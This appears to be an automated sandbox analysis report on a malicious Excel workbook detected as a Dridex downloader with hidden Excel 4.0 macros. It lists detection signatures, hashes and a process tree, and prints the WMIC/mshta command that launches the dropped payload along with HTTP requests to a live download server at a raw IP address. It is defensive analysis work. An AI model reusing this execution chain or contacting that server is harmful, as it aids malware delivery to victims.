Loading ...

Play interactive tourEdit tour

Windows Analysis Report subscription-673890410.xlsb

Overview

General Information

Sample Name:subscription-673890410.xlsb
Analysis ID:528007
MD5:47ee46b3521d1f85743ab56ac8c4f4b3
SHA1:a4b5e087009458f9a6a0e6f7b2e8ebbb261233f9
SHA256:444a0953b513aaad678d37e960dd7fe5841025e0bebf2e71eb350d4709a0f34f
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 1584 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 3076 cmdline: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 6488 cmdline: mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\xkNURUQaCiKQrGY.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1584, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", ProcessId: 3076
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 1584, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", ProcessId: 3076

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: subscription-673890410.xlsbVirustotal: Detection: 8%Perma Link
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.3:49779 -> 132.148.135.183:8080
      Source: global trafficTCP traffic: 192.168.2.3:49779 -> 132.148.135.183:8080
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.3:49779 -> 132.148.135.183:8080
      Source: Joe Sandbox ViewIP Address: 132.148.135.183 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.aadrm.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.cortana.ai
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.office.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.onedrive.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://augloop.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cdn.entity.
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cortana.ai
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cortana.ai/api
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://cr.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://directory.services.
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://graph.windows.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://graph.windows.net/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://login.windows.local
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://management.azure.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://management.azure.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://messaging.office.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://ncus.contentsync.
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://officeapps.live.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://onedrive.live.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://osi.office.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://outlook.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://outlook.office.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://outlook.office365.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://roaming.edog.
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://settings.outlook.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://tasks.office.com
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 92CD3603-5ED7-4DD8-A9A4-90905E37531F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
